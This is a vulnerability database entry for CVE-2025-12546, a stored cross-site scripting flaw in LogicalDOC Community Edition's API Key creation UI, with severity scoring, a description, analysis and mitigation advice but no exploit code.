LogicalDOC Community Edition
CVE-2025-12546
LOW
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
A vulnerability was determined in LogicalDOC Community Edition up to 9.2.1. This affects an unknown part of the component API Key creation UI. This manipulation causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.
AnalysisAI
Stored cross-site scripting (XSS) in LogicalDOC Community Edition up to 9.2.1 allows authenticated users to inject malicious scripts via the API Key creation UI, affecting the integrity of user data and potentially enabling credential theft or session hijacking. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), but publicly available exploit code exists and the vendor has not responded to early disclosure notification.
Technical ContextAI
The vulnerability exists in the API Key creation UI component of LogicalDOC Community Edition, a document management system. The underlying root cause is improper input validation and output encoding in user-supplied fields within the API Key creation interface, allowing attackers to inject arbitrary HTML and JavaScript that executes in the context of other users' sessions. This is a stored XSS vulnerability (CWE-79: Improper Neutralization of Input During Web Page Generation), where the malicious payload is persisted in the application and executed whenever the affected page is rendered. The attack surface is the web-based UI component responsible for managing API keys, and the vulnerability stems from insufficient sanitization before storing and displaying user input.
RemediationAI
No vendor-released patch identified at time of analysis - LogicalDOC vendor has not responded to disclosure and has not released a patched version. Immediate mitigation options include: (1) Upgrade to a newer version of LogicalDOC if available from community forks or alternative sources that have backported fixes, or migrate to a maintained alternative document management system; (2) Restrict access to the API Key creation UI by implementing network-level controls (e.g., IP allowlisting, WAF rules) to limit which users can reach this component; (3) Implement Content Security Policy (CSP) headers with 'script-src self' to mitigate stored XSS impact by preventing inline script execution, though this may break legitimate functionality; (4) Conduct regular security audits of API keys created in the system and invalidate any keys that appear suspicious or created by untrusted users. Organizations unable to patch should prioritize restricting access to the API Key creation interface to trusted administrators only and monitor for exploitation attempts via application logs and user activity logs.
Share
External POC / Exploit Code
Leaving vuln.today